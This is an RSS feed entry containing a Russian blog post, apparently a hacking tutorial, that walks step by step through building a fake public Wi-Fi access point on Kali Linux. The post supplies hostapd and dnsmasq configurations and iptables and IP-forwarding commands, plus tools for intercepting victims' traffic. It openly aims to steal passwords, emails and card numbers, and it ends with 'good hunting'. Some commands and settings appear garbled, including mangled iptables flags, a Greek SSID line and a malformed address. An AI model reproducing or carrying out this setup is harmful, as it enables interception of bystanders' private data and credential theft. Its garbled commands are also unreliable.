<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>@larkow</title><generator>teletype.in</generator><description><![CDATA[@larkow]]></description><link>https://teletype.in/@larkow?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=larkow</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/larkow?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/larkow?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Wed, 29 Apr 2026 01:42:12 GMT</pubDate><lastBuildDate>Wed, 29 Apr 2026 01:42:12 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@larkow/wCqg0URxoLj</guid><link>https://teletype.in/@larkow/wCqg0URxoLj?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=larkow</link><comments>https://teletype.in/@larkow/wCqg0URxoLj?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=larkow#comments</comments><dc:creator>larkow</dc:creator><title>Как поднять поддельную точку доступа Wi-FI</title><pubDate>Sat, 21 May 2022 08:23:55 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/44/89/44893b4d-3e07-42f4-b2b9-a1146180a19d.png"></media:content><description><![CDATA[<img src="https://img1.teletype.in/files/81/7d/817d5b0e-86fa-4bbe-bf80-72e798492e62.jpeg"></img>Расскажу, как поднять поддельную точку доступа Wi-Fi и воровать через нее чужие данные.]]></description><content:encoded><![CDATA[
  <p id="Umhm">Расскажу, как поднять поддельную точку доступа Wi-Fi и воровать через нее чужие данные.</p>
  <figure id="wJ7z" class="m_original">
    <img src="https://img1.teletype.in/files/81/7d/817d5b0e-86fa-4bbe-bf80-72e798492e62.jpeg" width="1920" />
  </figure>
  <p id="6CS3">Всем салют, дорогие друзья!<br /><strong>После прочтения данной статьи вы наверняка хорошенько подумайте, прежде чем подключиться к бесплатной общественной точке доступа беспроводной сети в кафетерии, аэропорту или отеле.</strong> Вы когда-нибудь задумывались, безопасен ли публичный Wi-Fi, к которому вы подключаетесь? <strong>Возможно, это поддельная точка доступа, созданная нами, хакерами.</strong></p>
  <p id="gmVl"><strong>После установки поддельной точки доступа и подключения к устройству жертвы хакер запускает атаку “человек посередине” (MITM) для перехвата данных между устройством жертвы и поддельной точкой доступа с целью осуществления дальнейших злонамеренных и вредоносных действий, нужных нам.</strong></p>
  <p id="xvNB"><strong><u>К сожалению, это не фантастика.</u></strong> Данный сценарий легко осуществим в реальной жизни.<strong> Атака “человек посередине”</strong> на Wi-Fi сети происходит, когда основной маршрут передачи данных между устройством жертвы и Интернетом проходит через атакующее устройство.</p>
  <p id="uGq0">После успешной атаки “человек посередине” в руки хакера попадет конфиденциальная информация жертв, такая как электронная почта, учетные записи, пароль, номер кредитной карты и другая важная информация, не защищенная протоколами безопасности. <strong>Мы легко можем получить доступ к чувствительным данным с помощью Ethercap, Dsniff Mailsnarf, Urlsnarf, Wireshark, Cain and Able и других инструментов.</strong></p>
  <p id="oOFu"><strong>Хакеры также могут использовать поддельные беспроводные точки доступа для сбора информации о жертвах.</strong> Для этого они создают в общественном месте точку доступа с примерным названием &quot;Free Public WiFi&quot;, которую ничего не подозревающие пользователи считают реальной. <strong>Жертва подключается к Wi-Fi сети, а хакеры в это время отслеживают/крадут ее данные.</strong></p>
  <figure id="u7kz" class="m_original">
    <img src="https://img2.teletype.in/files/9c/ab/9cab685a-b29e-45f2-a209-7428de90cc91.jpeg" />
  </figure>
  <p id="m6mp"><strong>Сейчас мы покажем вам, как можно осуществить данную атаку, используя всего один ноутбук под управлением Kali Linux.</strong> Особенностью атаки является то, что хакер и жертва находятся совсем рядом, практически бок о бок, в зоне действия Wi-Fi сигнала.</p>
  <h2 id="2GfE">За дело!</h2>
  <p id="2sGd"><strong>Шаг 1.</strong> Перед созданием поддельной точки доступа с помощью Kali Linux запустите команду &quot;<strong>sudo apt-get update</strong>”. Данная команда обновляет список всех пакетов для обновления, как старых пакетов, нуждающихся в обновлении, так и новых, находящихся на хранении.</p>
  <figure id="AcIg" class="m_original">
    <img src="https://img1.teletype.in/files/4e/3d/4e3dff5f-5a57-4135-880b-013379b9c961.jpeg" width="779" />
  </figure>
  <p id="WOQR"><strong>Шаг 2 . </strong>У вас должен быть доступ для установки <strong>hostapd </strong>и <strong>dnsmasq</strong>. Dnsmasq - небольшой DNS / DHCP-сервер, который мы будем использовать в этой атаке.</p>
  <figure id="Dj1f" class="m_original">
    <img src="https://img2.teletype.in/files/5e/38/5e387e18-70f1-4df9-bd69-a37b5c694d9f.jpeg" width="780" />
  </figure>
  <p id="sY1x">Перед началом установки hostapd следует проверить беспроводное соединение, <br />используя команду “iwconfig&quot;.</p>
  <figure id="GxNq" class="m_original">
    <img src="https://img1.teletype.in/files/82/ba/82ba854e-1cc1-45b1-8c85-038c61054435.jpeg" width="780" />
  </figure>
  <p id="vGuM">​Из приведенных выше выходных данных команды видно, что wlan0 - имя нашего <br />беспроводного интерфейса.<br />Шаг 3. Теперь вам нужно перевести этот беспроводной интерфейс в режим <br />мониторинга, введя следующие команды:<br />ifconfig wlan0 down</p>
  <p id="Wu3Y">iwconfig wlan0 mode monitor</p>
  <p id="qJb4">ifconfig wlan0 up</p>
  <figure id="zI4U" class="m_original">
    <img src="https://img1.teletype.in/files/49/53/49530752-9d69-4344-a9f9-a3fafa08aa2d.jpeg" width="780" />
  </figure>
  <p id="P8Or">​Шаг 4. Для запуска Hostapd, нам следует создать файл конфигурации для этого <br />инструмента, который будет содержать всю информацию о SSID, кодовой фразе, <br />номере канала и т. д.<br />Просто создайте каталог в /root с помощью команды “mkdir /root/accesspoint”, <br />чтобы сохранить все необходимые файлы для этой установки.</p>
  <figure id="eCFg" class="m_original">
    <img src="https://img1.teletype.in/files/c7/6a/c76a6746-ee00-42f8-acbb-22d5effab8fb.jpeg" width="779" />
  </figure>
  <p id="Ncw0">​Шаг 5. Теперь создайте файл конфигурации hostapd (hostapd.conf) в каталоге /<br />root/accesspoint и запишите в него следующую информацию:</p>
  <p id="zGUs" data-align="center">​Code:<br /><strong>interface=wlan0</strong></p>
  <p id="XK8y" data-align="center"><strong>driver=nl80211</strong></p>
  <p id="4K7D" data-align="center"><strong>ssid=Το όνομα που θέλετε (π.χ. Free WiFi)</strong></p>
  <p id="0xjB" data-align="center"><strong>hw_mode=g</strong></p>
  <p id="LN5G" data-align="center"><strong>channel=11</strong></p>
  <p id="fyZj" data-align="center"><strong>macaddr_acl=0</strong></p>
  <p id="90Vm" data-align="center"><strong>ignore_broadcast_ssid=0</strong></p>
  <p id="uGWO" data-align="center"><strong>auth_algs=1</strong></p>
  <p id="UTZl" data-align="center"><strong>wpa=2</strong></p>
  <p id="lxTZ" data-align="center"><strong>wpa_passphrase=iguru123</strong></p>
  <p id="dmxD" data-align="center"><strong><br />wpa_key_mgmt=WPA-PSK</strong></p>
  <p id="SZRR" data-align="center"><strong>wpa_pairwise=CCMP</strong></p>
  <p id="Mztt" data-align="center"><strong>wpa_group_rekey=86400</strong></p>
  <p id="1Q09" data-align="center"><strong>ieee80211n=1</strong></p>
  <p id="0mNF" data-align="center"><strong>wme_enabled=1</strong></p>
  <figure id="VI2g" class="m_original">
    <img src="https://img4.teletype.in/files/71/82/718281d1-c0ad-4d56-828b-ed40c15ea26f.jpeg" />
  </figure>
  <p id="AuZJ">Вот, что все это значит:</p>
  <p id="hgq8">interface = Беспроводной интерфейс (соединение) для размещения точки доступа, например. <strong>wlan0</strong></p>
  <p id="Y1Ki">driver = <strong>Nl80211</strong> - это новый общедоступный сетевой интерфейс 802.11, который теперь заменяется cfg80211</p>
  <p id="SB4v">ssid = Имя беспроводной сети</p>
  <p id="z1q6">hw_mode = Устанавливает, как работают интерфейс и разрешенные каналы. (Обычно используются a, b и g)</p>
  <p id="oIEs">channel = Устанавливает канал для работы hostapd. (От 1 до 13)</p>
  <p id="lj90">macaddr_acl = Используется для фильтрации Mac (0 - выключено, 1 - включено)</p>
  <p id="EhwF">ign_broadcast_ssid = Используется для создания скрытых точек доступа</p>
  <p id="eUY4">auth_algs = Устанавливает алгоритм аутентификации (0 - для открытого, 1 - для общего доступа)</p>
  <p id="0Kw8">wpa_passphrase = Содержит ваш WPA пароль</p>
  <p id="kKwn"><strong>Шаг 6</strong> . Просто запустите точку доступа с помощью следующей команды:</p>
  <p id="lXY3"><code>hostapd hostapd.conf</code></p>
  <figure id="ORT5" class="m_original">
    <img src="https://img3.teletype.in/files/6a/1f/6a1fa368-81d6-4ab0-ab1a-a6a8419fc586.jpeg" width="779" />
  </figure>
  <p id="jHGl">Как видите, ваш hostapd успешно работает с wlan0: <strong>AP-ENABLED</strong> и новым hwaddr, которому случайным образом назначается <strong>“90:f6:52:e3:2e:c2”</strong>, а также ssid, который вы установили.</p>
  <p id="RHbC"><strong>Шаг 7.</strong> Теперь вам нужно настроить сетевую маршрутизацию с помощью инструмента <strong>dnsmasq</strong>, чтобы имелась возможность переключать трафик между сетевыми узлами, а также был путь для отправки данных.</p>
  <p id="rJNH">Создайте файл конфигурации в корневом каталоге с именем <strong>dnsmasq.conf </strong>и напишите следующие инструкции:</p>
  <p id="sd45"><strong>Code:</strong></p>
  <p id="psZD">interface=wlan0</p>
  <p id="dcLZ">dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h</p>
  <p id="dWYg">dhcp-option=3,192.168.1.1</p>
  <p id="a0s2">dhcp-option=6,192.168.1.1</p>
  <p id="dgZi">server=8.8.8.8</p>
  <p id="L6y3">log-queries</p>
  <p id="P2mT">log-dhcp</p>
  <p id="eIJa">listen-address=127.0 .0.1</p>
  <figure id="88ZS" class="m_original">
    <img src="https://img4.teletype.in/files/b0/33/b033cb97-3d8b-4cef-aa7b-fcc7e774698b.jpeg" width="780" />
  </figure>
  <p id="Manf"><strong>Шаг 8 </strong>. Назначьте сетевой шлюз и сетевую маску wlan0 интерфейсу и добавьте таблицу маршрутизации, как показано ниже:</p>
  <p id="vjob">ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0</p>
  <p id="MBEO">route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1</p>
  <p id="HIDC">Затем вам нужно запустить службу dnsmasq с файлом конфигурации, который мы создали на предыдущем шаге:</p>
  <pre id="kZ56"> dnsmasq -C dnsmasq.conf -d</pre>
  <p id="27Gh"><strong>Dnsmasq </strong>— легковесный и быстроконфигурируемый DNS-, DHCP- и TFTP-сервер, предназначенный для обеспечения доменными именами и связанными с ними сервисами небольших сетей. Dnsmasq отлично подходит для ограниченных ресурсов маршрутизаторов и межсетевого экрана. Dnsmasq также можно настроить для кэширования DNS-запросов для повышения скорости поиска DNS на сайтах, которые они уже посетили.</p>
  <figure id="OJqG" class="m_original">
    <img src="https://img3.teletype.in/files/61/8a/618a122f-44fb-4fca-9286-a0b81821afce.jpeg" width="780" />
  </figure>
  <p id="Y000"><strong>Шаг 9</strong>. Перед тем, как предоставить доступ в Интернет своим жертвам, убедитесь, что вы настроили iptables, только тогда вы сможете собирать данные и выполнять различные дальнейшие атаки, такие как “ Человек посередине” (MITM), DNS спуфинг, ARP спуфинг и т. д.</p>
  <p id="ZDAD">iptables –table nat –append POSTROUTING -out-interface eth0 -j MASQUERADE</p>
  <p id="DYzg">iptables –append FORWARD –in-interface wlan0 -j ACCEPT</p>
  <figure id="n79g" class="m_original">
    <img src="https://img3.teletype.in/files/e4/de/e4dea301-53d2-4259-b8a2-6fe2795b40b0.jpeg" width="779" />
  </figure>
  <p id="EJdM"><strong>Шаг 10</strong> . Последний шаг. Включите процесс IP переадресации, набрав “<strong>echo 1&gt; / proc / sys / net / ipv4 / ip_forward</strong> &quot;.</p>
  <figure id="WQRQ" class="m_original">
    <img src="https://img4.teletype.in/files/78/5c/785cddb9-8de8-4aaf-9e82-eee40229be01.jpeg" width="780" />
  </figure>
  <p id="iNFJ">Поддельная точка доступа предоставит жертве подключение к Интернету через сетевую Ethernet карту, тем самым гарантируя, что <strong>весь трафик, генерируемый жертвой будет проходить через нас</strong></p>
  <figure id="mxP1" class="m_original">
    <img src="https://img2.teletype.in/files/54/ac/54ac3772-27c8-4f50-acde-3bf9ebddf766.jpeg" width="779" />
  </figure>
  <p id="iNFJ">Поддельная точка доступа предоставит жертве подключение к Интернету через сетевую Ethernet карту, тем самым гарантируя, что <strong>весь трафик, генерируемый жертвой будет проходить через нас.</strong></p>
  <p id="kqNR"><strong>На сегодня это все. Желаем хорошей охоты!</strong></p>

]]></content:encoded></item></channel></rss>